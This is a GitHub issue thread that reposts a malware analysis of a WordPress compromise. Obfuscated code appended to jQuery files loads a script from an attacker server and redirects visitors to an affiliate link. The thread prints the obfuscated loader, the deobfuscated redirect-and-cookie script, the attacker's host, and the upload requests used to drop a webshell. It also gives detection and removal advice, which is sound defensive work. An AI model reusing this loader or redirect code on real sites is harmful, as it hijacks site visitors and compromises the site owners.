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WordPress Hacks: jQuery JS script injection #95

Open marcialwushu opened 6 years ago

marcialwushu commented 6 years ago

WordPress Hacks: jQuery JS script injection


In the second of my series of articles about different exploits seen for WordPress sites, I discuss a particular attack that causes all pages on an infected site to redirect to a page of the attacker's choice, which in this case was an affiliate link. This attack involves adding malicious code to jQuery .js files based on the assumption that jQuery is probably going to be included in every page request.

The article will discuss how the exploit works, what it does once the infection has been made, how the attack is performed and how to remove it, as well as identifying the server involved in making this attack work. It also briefly discusses some variations that have been seen.

Code Examples

Detection of Infections

Once infected, whenever a user visits a page on the site in question they will be redirected to another site. Reloading the site again will not cause this redirect; a cookie is used as a flag to control how often the redirection will take place, and removing this cookie will cause the redirection to occur again next time a page is loaded. Redirection is caused by the malicious code setting a new value for window.location.href.

This attack targets all files that match a pattern similar to jquery*.js, meaning that files like jquery.js, jquery.min.js and jquery.ui.core.js will all be affected.

Code Analysis

jQuery additional code

The attack appends some malicious code to the end of any matching .js file. This code is obfuscated and looks like this: -

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

This code contains two main parts: an array _0xaae8 which contains six obfuscated strings and code which uses this array to execute a command. After decoding, the array contents becomes: -

["", "join", "reverse", "split", ">tpircs/<>\"sj.yreuqj/87.611.942.431//:ptth"=crs tpircs<", "write"]

Thus, the final command becomes: -

document.write(">tpircs/<>\"sj.yreuqj/87.611.942.431//:ptth\"=crs tpircs<".split("").reverse().join.("")

A breakdown of the steps gives us to the following functionality: -

This code uses a few interesting techniques to help avoid detection: -

Once decoded it's easy to see that the script is doing something that we perhaps do not want, however when encoded this purpose is not easy to perceive. However, it's also quite clear to see that this code has something to hide, so if you ever see something like this you should become extra vigilant!

Downloaded payload

The contents of the jquery.js file downloaded from the attacker's server is also obfuscated in a similar way to the script above. As this code is larger I have posted a copy to PasteBin rather than displaying it in this article in full. I have also de-obfuscated the script and changed some of the function names to make it more readable.

This second script performs the following actions: -

The actual redirection causes this hard-coded URL to be loaded by the browser: https://go.ad2up.com/afu.php?id=473791. This appears to be a link to an affiliate link network, and loading this page causes a further redirect to an advertiser after giving the attacker (who has the account ID 473791) some kind of payback from the advertiser.

Attack Vector

Thanks to Alex Grey and an anonymous reader for supplying further details as to how this exploit is installed.

The following link gives some more details as to how the attack is performed: https://malware.expert/malware/db-php/.

It appears that the attacker specifically searches for WordPress sites which have user accounts with weak passwords. There are various ways in which an attacker can narrow down the list of potential users and I will write more about this in a future blog. Most WordPress sites however have an "admin" user so this user account commonly comes under brute-force password attack. This means that an attacker will simply attempt to log in as this user using a list of common passwords. If the password is weak then they will surely succeed eventually.

If the attacker is successful, they first edit the theme's 404.php template and insert the code that performs the infection of the JS files. This script contains the payload (the obfuscated JS that is added to all JS files on the site) and a script which recursively searches for JS files in which to insert this payload. The attacker saves this modified script and then immediately accesses it in order to run the exploit.

It is also common to see an additional script being uploaded after this, usually named db.php. I will provide a full write-up of this exploit in a separate blog post, but in summary this script contains an obfuscated WSO webshell. This script allows the attacker (with a password) to perform almost any other exploit on the server.

Analysis of Attacker Servers

This attack could have injected code to redirect the browser to the actual affiliate link, however it has been written to involve an intermediary server at which serves the actual payload that will be executed.

The server itself runs Apache and is configured to display server statistics. WARNING: the following is an active link to the attacker, so be aware that visiting this page will display your request to anybody visiting this page and to the attacker themselves! Warnings aside, here is the link: On this status page, we can see exactly how many people are requesting this malicious script from this server (as of writing there are around 2.9 requests every second to this server, and more than 2.5 million since the server came up). This just shows how widespread this attack actually is, and how much this attacker must be making from affiliate links!


Removal of this exploit is very easy. All that is required is to locate every file on the site that matches the pattern jquery*.js and then to remove the malicious code that is appended to the file contents (see above for details). Once all files have been cleared, the infection has effectively been removed.

After continued study of this attack, it appears that some variants infect all JavaScript files (*.js), not just those having "jquery" in the file name. Therefore it is important now to search for all .js files to make sure.

As mentioned above, attackers often drop a WSO webshell onto the server, often named db.php. If these exist then it is extremely important that they also be deleted, but take care not to delete a valid WordPress script in the process.

My Web Exploit Detector is capable of detecting these scripts so this can also be installed and run in order to do a thorough check of all site files.


This exploit takes a lot of care to blend in by using some very common file and cookie names. It also takes care not to be too greedy; each user will only be redirected around once per day meaning that many people will simply accept this attack on their sites and not look for a way to remove it. Also, users of the site might not think to report the issue as when they reload the page to double check everything will seem to be okay. Hopefully detailing the information here will provide others with a way of finding out about this attack and also give them the ability to remove it.

While not particularly malicious in its effect, this exploit does however have a serious impact. For one, the scope of the attack means that somebody is making a lot of money from subversion and trickery. Secondly, both site owners and users are negatively affected by having control taken away from them and arbitrary content displayed to them without either party's consent. In addition to this, by dropping a WSO webshell onto the server the attackers are leaving the server open for any type of exploit in the future.

Fortunately, the exploit is easy to remove so I would advise anybody experiencing this exploit on their own sites to take the above action immediately. As always, please be careful when modifying source code; if in doubt ask an expert to edit these files for you.

marcialwushu commented 6 years ago



marcialwushu commented 6 years ago


This malware try upload db.php to WordPress clickjacking vulnerability.

Clickjacking is an attack that places an invisible iframe containing a webpage over top of another, visible webpage. The victim user is lured into clicking on the invisible iframe to perform an action when they think they are clicking on the webpage they can see. The iframe on top is made invisible using the CSS Opacity property, it is placed above other elements on the webpage by using the CSS Z-Index property, and it is lined up with the webpage underneath using CSS absolute positioning.

Versions of WordPress prior to 3.1.3 are vulnerable to clickjacking, so this is very old attack method.

POST /wp-admin/update.php?action=upload-plugin

Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/plugin-install.php?tab=upload

POST /wp-admin/update.php?action=upload-plugin

Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/theme-editor.php?file=404.php&theme=twentysixteen

db.php sourcecode

If malware successful uploaded server, it GET requests and it infects every javascript files (.js) with javascript malware code.

Append to javascript files

var 0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69

We decoded this javascript code and found that it try load more javascript malware:

NOTE: Not fully decoded correct!

write.("tpircs/<>"sj.yreuqj/87.611.942.431//:ptth"=crs tpircs<split()reverse()join())

Source jquery.js

var _0x8a42 = ["href", "location", "http://go.ad2up.com/afu.php?id=473791", "getTime", "setTime", "cookie", "=", ";expires=", "toGMTString", "; path=", "", "indexOf", "length", "substring", ";", "cookieEnabled", "/wp-admin/", "pathname", "csrf_uid", "1", "/", "loaded", "addEventListener", "load", "onload", "attachEvent"];

function _1q0x() {
  window[_0x8a42[1]][_0x8a42[0]] = _0x8a42[2]

function _q1x0(_0x762dx3, _0x762dx4, _0x762dx5, _0x762dx6) {
  var _0x762dx7 = new Date();
  var _0x762dx8 = new Date();
  if (_0x762dx5 === null || _0x762dx5 === 0) {
    _0x762dx5 = 3
  _0x762dx8[_0x8a42[4]](_0x762dx7[_0x8a42[3]]() + 3600000 * 24 * _0x762dx5);
  document[_0x8a42[5]] = _0x762dx3 + _0x8a42[6] + escape(_0x762dx4) + _0x8a42[7] + _0x762dx8[_0x8a42[8]]() + ((_0x762dx6) ? _0x8a42[9] + _0x762dx6 : _0x8a42[10])

function _z1g1(_0x762dxa) {
  var _0x762dxb = document[_0x8a42[5]][_0x8a42[11]](_0x762dxa + _0x8a42[6]);
  var _0x762dxc = _0x762dxb + _0x762dxa[_0x8a42[12]] + 1;
  if ((!_0x762dxb) && (_0x762dxa != document[_0x8a42[5]][_0x8a42[13]](0, _0x762dxa[_0x8a42[12]]))) {
    return null
  if (_0x762dxb == -1) {
    return null
  var _0x762dxd = document[_0x8a42[5]][_0x8a42[11]](_0x8a42[14], _0x762dxc);
  if (_0x762dxd == -1) {
    _0x762dxd = document[_0x8a42[5]][_0x8a42[12]]
  return unescape(document[_0x8a42[5]][_0x8a42[13]](_0x762dxc, _0x762dxd))
if (navigator[_0x8a42[15]]) {
  if (window[_0x8a42[1]][_0x8a42[17]][_0x8a42[11]](_0x8a42[16]) != -1) {
    _q1x0(_0x8a42[18], _0x8a42[19], _0x8a42[19], _0x8a42[20])
  if (window[_0x8a42[1]][_0x8a42[17]][_0x8a42[11]](_0x8a42[16]) == -1) {
    if (_z1g1(_0x8a42[18]) == 1) {} else {
      _q1x0(_0x8a42[18], _0x8a42[19], _0x8a42[19], _0x8a42[20]);
      if (document[_0x8a42[21]]) {
      } else {
        if (window[_0x8a42[22]]) {
          window[_0x8a42[22]](_0x8a42[23], _1q0x, false)
        } else {
          window[_0x8a42[25]](_0x8a42[24], _1q0x)


So this is endless loop, to get more and more malware, but also trying somepoint open ShockwaveFlash malware too ..


marcialwushu commented 6 years ago
